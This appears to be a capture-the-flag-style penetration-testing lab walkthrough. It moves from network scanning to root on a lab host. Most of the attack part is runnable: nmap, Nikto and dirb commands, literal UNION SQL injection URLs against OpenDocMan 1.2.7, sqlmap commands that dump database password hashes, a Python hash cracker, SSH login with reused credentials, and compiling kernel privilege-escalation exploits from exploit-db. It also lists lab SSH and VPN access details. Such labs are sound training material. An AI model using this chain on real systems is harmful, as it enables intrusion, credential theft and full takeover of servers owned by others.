joemccray

QuickLab

Jun 2nd, 2018
Use PuTTY to SSH into my Ubuntu host in order to perform the lab tasks below.

You can download PuTTY from here:
http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe


IP Address: 45.76.254.222
Protocol: ssh
Port: 22
username: ceh
password:


Attack steps:
-------------



Step 1: Ping sweep the target network
-------------------------------------

A host-discovery scan lists the addresses in the /24 that answer nmap's discovery probes. A host that drops ICMP and the default TCP probes will not appear, so an address missing from this list is not proof that nothing is there.

---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------

(-sP is the old spelling of -sn, the host-discovery-only scan; current nmap releases accept both.)


- Found 3 hosts
172.31.2.64
172.31.2.217
172.31.2.238



Step 2: Port scan target system
-------------------------------

With no port list given, nmap -sV probes its default set of 1000 common TCP ports and then fingerprints whatever is open. Add -p- if you also want the remaining 64,535 ports.

---------------------------Type This-----------------------------------
nmap -sV 172.31.2.64
-----------------------------------------------------------------------



-------------Scan Results--------------------------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
514/tcp filtered shell
1037/tcp filtered ams
6667/tcp open irc ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------

Three services answered: SSH, an Apache web server and an ngircd IRC daemon. "filtered" on 514 and 1037 means nmap got no reply at all (usually a firewall rule), so there is no version to report for them. The Ubuntu package versions (OpenSSH 6.6p1-2ubuntu2.6, Apache 2.4.7) are the Ubuntu 14.04 builds, which matters later when choosing a kernel exploit.
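As an added example (not part of the original lab), a small parser for the nmap -sV port table above, so the "open" lines can be separated from the "filtered" noise and the web service handed straight to the next step. The input is the page's own scan result, constructed here as a string; the helper names and the service-to-URL mapping are my own.

```python
import re

# Constructed input: the -sV port table from the scan above, copied as it appears
# on the page (column spacing collapsed). The parser tolerates real nmap spacing too.
SCAN_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
514/tcp filtered shell
1037/tcp filtered ams
6667/tcp open irc ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line: "<port>/<proto> <state> <service> [<version ...>]". The state field
# can be a compound such as "open|filtered" on UDP scans, hence the '|' in the class.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+"
    r"(?P<state>[a-z|]+)\s+"
    r"(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$"
)


def parse_ports(text):
    """One dict per port line; the header and 'Service Info' lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            d = m.groupdict()
            d["port"] = int(d["port"])
            d["version"] = d["version"] or ""   # filtered ports carry no version
            ports.append(d)
    return ports


def open_ports(text):
    """Only state == 'open' counts. 'filtered' means no answer at all (usually a
    firewall) and says nothing about whether a service sits behind the port."""
    return [p["port"] for p in parse_ports(text) if p["state"] == "open"]


def unversioned_open(text):
    """Open ports where -sV could not name the software: candidates for manual probing."""
    return [p["port"] for p in parse_ports(text)
            if p["state"] == "open" and not p["version"]]


def web_targets(text, host):
    """URLs to hand to Nikto/dirb in the next step, built from open http/https services."""
    urls = []
    for p in parse_ports(text):
        if p["state"] != "open":
            continue
        if p["service"] in ("http", "http-alt", "http-proxy"):
            urls.append(f"http://{host}:{p['port']}")
        elif p["service"] in ("https", "ssl/http"):
            urls.append(f"https://{host}:{p['port']}")
    return urls


if __name__ == "__main__":
    for p in parse_ports(SCAN_OUTPUT):
        print(f"{p['port']:>5}/{p['proto']} {p['state']:<8} {p['service']:<6} {p['version']}")
    print("open:", open_ports(SCAN_OUTPUT))
    print("web targets:", web_targets(SCAN_OUTPUT, "172.31.2.64"))
```

Run it on a saved scan (nmap -sV 172.31.2.64 -oN scan.txt) by reading the file into parse_ports instead of SCAN_OUTPUT; the regex does not depend on the collapsed spacing shown on the page.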


Step 3: Vulnerability Scan the webserver
----------------------------------------


---------------------------Type This-----------------------------------
cd ~/toolz/Nikto2/program

perl nikto.pl -h 172.31.2.64
-----------------------------------------------------------------------


Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------


---------------------------Type This-----------------------------------
cd ~/toolz/dirb/


./dirb http://172.31.2.64 wordlists/big.txt
-----------------------------------------------------------------------



Step 5: Browse the web site to look for clues
---------------------------------------------
To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
https://54.245.178.32/?src=connect

Accept the security exception and enter one of the following user names:

username: labuser001
username: labuser002
username: labuser003
username: labuser004
username: labuser005
username: labuser006
username: labuser007
username: labuser008
username: labuser009
username: labuser010
username: labuser011
username: labuser012
username: labuser013
username: labuser014
username: labuser015
username: labuser016
username: labuser017
username: labuser018
username: labuser019
username: labuser020



Since the scanners found no glaring vulnerabilities, we start by just looking around the website itself.

Nikto and dirb gave us very little, so we opened the web page in a browser:
http://172.31.2.64/

The front page pointed to:
http://172.31.2.64/jabc

The Documentation link there contained hidden text pointing to:
http://172.31.2.64/jabcd0cs/

That application identified itself as OpenDocMan v1.2.7, which has a published SQL injection in ajax_udf.php:
https://www.exploit-db.com/exploits/32075/

Tried the SQL injection described on exploit-db. The add_value parameter ends up in the query as a table name (note add_value=odm_user), so the injected UNION has to return the same number of columns as the original SELECT (nine here), and the second column is the one that shows up in the response:
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9

http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
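To make the mechanics of that payload concrete, here is an added example (my own code, not OpenDocMan's and not from the original lab) that models the injection against an in-memory SQLite database. The schema, column names and row values are constructed for the demo; the exact statement in ajax_udf.php is not reproduced, only the injection point: the request value is spliced in as a table name, which is why bind parameters alone cannot fix it and an allow-list is needed. The q parameter from the URL is not modelled. MySQL's version()/user() are replaced by SQLite's sqlite_version() in the same column position.

```python
import sqlite3

# Constructed demo schema, NOT OpenDocMan's real tables or columns. Each table has nine
# columns so an attacker must supply nine UNION columns, which is why the payload on the
# page reads 1,version(),3,4,5,6,7,8,9. Row values are made up for the demo.
SCHEMA = """
CREATE TABLE odm_user (id INTEGER, username TEXT, password TEXT, department INTEGER,
                       phone TEXT, email TEXT, last_name TEXT, first_name TEXT,
                       pw_reset_code TEXT);
INSERT INTO odm_user VALUES (1, 'webmin', 'b78aae356709f8c31118ea613980954b', 1, '',
                             'webmin@example.net', 'Admin', 'Web', '');
CREATE TABLE odm_udf (id INTEGER, name TEXT, c3 TEXT, c4 TEXT, c5 TEXT,
                      c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT);
INSERT INTO odm_udf VALUES (1, 'Project', '', '', '', '', '', '', '');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_query(conn, add_value):
    """Models the bug: the request parameter is spliced in as the table name. A table
    name cannot be passed as a bind parameter, so "use prepared statements" on its own
    does not close this hole."""
    return conn.execute(f"SELECT * FROM {add_value}").fetchall()


# Hardened version: the request may only pick from a fixed, hypothetical allow-list of
# table names; the untrusted string never reaches the SQL text.
ALLOWED_TABLES = {"udf": "odm_udf", "user": "odm_user"}


def hardened_query(conn, selector):
    table = ALLOWED_TABLES.get(selector)
    if table is None:
        raise ValueError(f"rejected table selector: {selector!r}")
    return conn.execute(f"SELECT * FROM {table}").fetchall()


# Payloads shaped like the page's request (sqlite_version() stands in for version()).
FINGERPRINT = "odm_udf UNION SELECT 1,sqlite_version(),3,4,5,6,7,8,9"
DUMP_USERS = "odm_udf UNION SELECT id,username,password,4,5,6,7,8,9 FROM odm_user"


def injected_version(conn):
    """Finds the UNION row (columns 3..9 are the literals 3..9) and returns column 2."""
    rows = vulnerable_query(conn, FINGERPRINT)
    return next(r[1] for r in rows
                if tuple(str(x) for x in r[2:]) == tuple("3456789"))


def dumped_hashes(conn):
    """Same trick with real columns: odm_user rows ride along with the legitimate result.
    The legitimate odm_udf row has an empty third column, which is how the two are told
    apart in this demo."""
    rows = vulnerable_query(conn, DUMP_USERS)
    return {r[1]: r[2] for r in rows if r[2]}


if __name__ == "__main__":
    db = make_db()
    print("db version via injection:", injected_version(db))
    print("hashes via injection:", dumped_hashes(db))
    try:
        hardened_query(db, FINGERPRINT)
    except ValueError as e:
        print("hardened handler:", e)
```

The second payload is the step the lab reaches with sqlmap below: once the column count is known, any table the DB account can read can be pulled through the same UNION.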



Then run sqlmap against the same parameter. --dbms=mysql skips the DBMS fingerprinting, -b pulls the server banner, and --users/--passwords read the hashes out of mysql.user (that succeeds here only because the application's DB account can read that table):


---------------------------Type This-----------------------------------
cd ~/toolz/sqlmap-dev/
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
-----------------------------------------------------------------------



FOUND: sqlmap cracked the password 'toor' for the MySQL user 'drupal7'
FOUND: the hash 9CFBBC772F3F6C106020035386DA5BBBF1249A11 (MySQL's SHA1(SHA1(password)) format) is 'toor', verified at crackstation.net



---------------------------Type This-----------------------------------
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
-----------------------------------------------------------------------

The odm_user dump contains an account with a 32-character, unsalted hash:

username: webmin
hash: b78aae356709f8c31118ea613980954b

Looked it up at https://hashkiller.co.uk/md5-decrypter.aspx (an online lookup; on a real engagement crack the hash locally rather than uploading a client's hashes to a third-party site):

hash: b78aae356709f8c31118ea613980954b
pass: webmin1980
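Both lookups above (crackstation.net for the MySQL hash, hashkiller.co.uk for the MD5) can be done locally. As an added example, not part of the original lab, the code below tells the two formats apart by shape, rehashes candidate passwords in the right format and compares. The wordlist is constructed for the demo and the helper names are my own; the MySQL format (a '*' followed by uppercase SHA1(SHA1(password))) is the documented mysql_native_password scheme.

```python
import hashlib
import re


def mysql_native_hash(password):
    """mysql_native_password / PASSWORD() in MySQL 4.1+: '*' + uppercase hex of
    SHA1(SHA1(password)). This is the format of the drupal7 hash sqlmap pulled from
    mysql.user above (sqlmap shows it without the leading '*')."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def md5_hex(password):
    """Unsalted MD5, the format of the odm_user password column."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def identify(stored):
    """Cheap format guess from shape alone: 40 hex chars (optionally '*'-prefixed) is
    the MySQL native hash, 32 hex chars is raw MD5. Anything else returns None
    rather than guessing."""
    h = stored.strip()
    if re.fullmatch(r"\*?[0-9A-Fa-f]{40}", h):
        return "mysql_native"
    if re.fullmatch(r"[0-9A-Fa-f]{32}", h):
        return "md5"
    return None


HASHERS = {"mysql_native": mysql_native_hash, "md5": md5_hex}


def matches(candidate, stored):
    """Compare a candidate password against a stored hash, ignoring case and '*'."""
    fmt = identify(stored)
    if fmt is None:
        raise ValueError(f"unrecognised hash format: {stored!r}")
    got = HASHERS[fmt](candidate).lstrip("*").lower()
    return got == stored.strip().lstrip("*").lower()


def crack(stored, wordlist):
    """Return the first word that hashes to `stored`, or None if the list is exhausted."""
    for word in wordlist:
        if matches(word, stored):
            return word
    return None


# Constructed wordlist for the demo; a real run would feed rockyou.txt or similar.
WORDLIST = ["password", "root", "toor", "admin", "webmin", "webmin1980"]

if __name__ == "__main__":
    for h in ("9CFBBC772F3F6C106020035386DA5BBBF1249A11",   # drupal7, from mysql.user
              "b78aae356709f8c31118ea613980954b"):          # webmin, from odm_user
        print(identify(h), h, "->", crack(h, WORDLIST))
```

Neither format is salted, so a precomputed table or a fast GPU run covers them; that is the design weakness the online lookup sites exploit, and it applies just as well offline.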


Neither /phpmyadmin nor /webmin answered in the browser, but the same username and password worked for SSH: the web application's credentials had been reused for a system account.



---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
webmin1980

id

cat /etc/*release
-----------------------------------------------------------------------

(The second line is the password, typed at the ssh password prompt, not as a command.)


The login shell we land in is not a usable interactive shell, so spawn a proper one with python's pty module, then build the first privilege-escalation candidate in /tmp:


---------------------------Type This-----------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'


cd /tmp

pwd


cat > exploit.c << 'out'

**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/


------ hit enter a few times ------

------ then type 'out' ----- this ends the here-document and closes the file...

The delimiter is quoted ('out') on purpose: with a bare << out the shell would expand any $variable, `command` or backslash pair inside the pasted C source before it reaches the file. Using > rather than >> also makes sure a second paste does not get appended to a half-written exploit.c.



---------------------------Type This-----------------------------------
gcc -o boom exploit.c

./boom
-----------------------------------------------------------------------


------------exploit failed, damn let's try another one ---------

A kernel exploit that compiles but does nothing usually means the running kernel is outside the version range it was written for. Compare the output of uname -r with the kernel versions listed in the exploit's header before spending time on the next candidate.



---------------------------Type This-----------------------------------
cat > exploit2.c << 'out'

**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/


out


gcc -o boom2 exploit2.c

./boom2

id
-----------------------------------------------------------------------


......YEAH - do the happy dance!!!! (id should now report uid=0(root); the second exploit matched this kernel where the first did not)